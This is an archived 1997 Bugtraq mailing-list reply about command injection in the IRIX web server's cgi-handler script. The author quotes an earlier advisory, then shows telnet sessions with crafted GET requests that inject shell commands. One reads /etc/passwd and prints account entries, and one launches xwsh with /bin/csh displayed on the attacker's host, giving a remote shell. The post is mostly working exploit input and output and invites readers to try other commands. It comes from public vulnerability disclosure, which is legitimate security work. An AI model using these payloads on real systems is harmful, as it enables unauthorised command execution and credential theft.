[5006] in bugtraq
Re: CPSR 7: IRIX WWW Server
daemon@ATHENA.MIT.EDU (Thomas Walter)
Thu Jul 24 12:20:08 1997
Date: Thu, 24 Jul 1997 17:51:56 +0200
Reply-To: balu@STUDST.FH-MUENSTER.DE
From: Thomas Walter <balu@STUDST.FH-MUENSTER.DE>
To: BUGTRAQ@NETSPACE.ORG
Hiho...
[Corinne Posse Relaeses wrote]
> Quite a while ago, Razvan Dragomirescu (drazvan@kappa.ro) released a
> report on the default cgi-handler scripts that ship with IRIX systems
> with web servers, and some other web server programs. Just like with
> the phf bug, with the cgi-handler bug a malicious user could start
> an xterm from the server machine on their own system.
>
> Example:
>
> telnet www.highly.respectable.bank.com 80
> Trying 300.300.300.1...
> Connected to www.highly.respectable.bank.com
> Escape character is '^]'.
> GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
>
> Please note the format of the "GET" query. The above assumes xwsh is
> in the
> PATH somewhere, and the "space" between "xwsh" and "-display" sould be
> a TAB.
I've got some problems while trying that...
First it seems, that the xwsh was not in the path so I tried to call
xwsh with a given path (note that all whitespaces after GET
/cgi-bin/handler/ must be Tabs...):
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%
That opened the xwsh window... But there was only one error-message in
the first line:
/usr/sbin/xwsh: Permission denied: can't start command
Hm - What could that be? Doesn't matter - Lets see what I can do with
other commands... (Remember the tabs...)
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I wont give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.
Hm - a shadowed passwd... was my first thought... Lets see If I can get
the shadow... [As above] - Didnt work. So It seems that the WWWserver
was not running as root (what a pity ;). If it does not run as root - it
usually runs as nobody. And what can we see above? Nobody got the shell
/dev/null - thats why my xwsh was not able to start a command. Next Try
was to give xwsh the command that it should start... (And again: Tabs! -
and of course everything in one line...)
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%
And voila! - What else do you want? Any other programs to start? Just
try...
Brgds
Balu
--
/'^'\
Please note: english is not my mother tongue ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu@studst.fh-muenster.de
Snail Mail: Thomas Walter
Wemhoefer Stiege 10a, 48565 Burgsteinfurt .oooO
or Broxtermannstr.12, 49082 Osnabrueck, GERMANY( ) Oooo.
---------------------------------------------------------\ (----( )-
\_) ) /
(_/
